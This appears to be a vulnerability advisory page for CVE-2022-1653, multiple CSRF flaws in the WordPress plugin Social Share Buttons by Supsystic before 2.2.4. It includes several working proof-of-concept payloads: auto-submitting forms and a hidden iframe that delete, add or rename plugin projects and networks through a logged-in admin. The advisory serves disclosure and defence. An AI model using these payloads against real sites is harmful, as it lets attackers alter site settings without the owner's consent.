Lucene search
Daniel RufWPEX-ID:52EFF451-8CE3-4AC4-B530-3196AA82DB48HistoryJun 01, 2022 - 12:00 a.m.
Social Share Buttons by Supsystic < 2.2.4 - Multiple CSRF
2022-06-0100:00:00
Daniel Ruf
90
0.001 Low
EPSS
Percentile
26.1%
The plugin does not perform CSRF checks in it’s ajax endpoints and admin pages, allowing an attacker to trick any logged in user to manipulate or change the plugin settings, as well as create, delete and rename projects and networks.
<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="route[module]" value="projects">
<input type="text" name="route[action]" value="removeNetwork">
<input type="text" name="network_id" value="1">
<input type="text" name="project_id" value="4">
<input type="text" name="action" value="social-sharing">
</form>
<script>
document.getElementById("test").submit();
</script>
<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="route[module]" value="projects">
<input type="text" name="route[action]" value="add">
<input type="text" name="title" value="test">
<input type="text" name="design" value="flat">
<input type="text" name="networks[0]" value="1">
<input type="text" name="action" value="social-sharing">
</form>
<script>
document.getElementById("test").submit();
</script>
<form id="test" action="https://example.com/wp-admin/admin.php?page=supsystic-social-sharing&module=projects&action=delete&id=2" method="POST">
</form>
<script>
document.getElementById("test").submit();
</script>
<iframe src="https://example.com/wp-admin/admin.php?page=supsystic-social-sharing&module=projects&action=delete&id=3" width="0" height="0" frameborder="0"></iframe>
<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="route[module]" value="projects">
<input type="text" name="route[action]" value="rename">
<input type="text" name="title" value="Hacked">
<input type="text" name="id" value="4">
<input type="text" name="action" value="social-sharing">
</form>
<script>
document.getElementById("test").submit();
</script>Related
wpvulndb
wpvulndb
Social Share Buttons by Supsystic < 2.2.4 - Multiple CSRF
2022-06-01 00:00:00
cvelist
cvelist
CVE-2022-1653 Social Share Buttons by Supsystic < 2.2.4 - Multiple CSRF
2022-06-27 08:57:22
cnvd
cnvd
WordPress Social Share Buttons by Supsystic plugin跨站请求伪造漏洞
2022-06-30 00:00:00
cve
cve
CVE-2022-1653
2022-06-27 09:15:09
prion
prion
Cross site request forgery (csrf)
2022-06-27 09:15:00
nvd
nvd
CVE-2022-1653
2022-06-27 09:15:09
patchstack
patchstack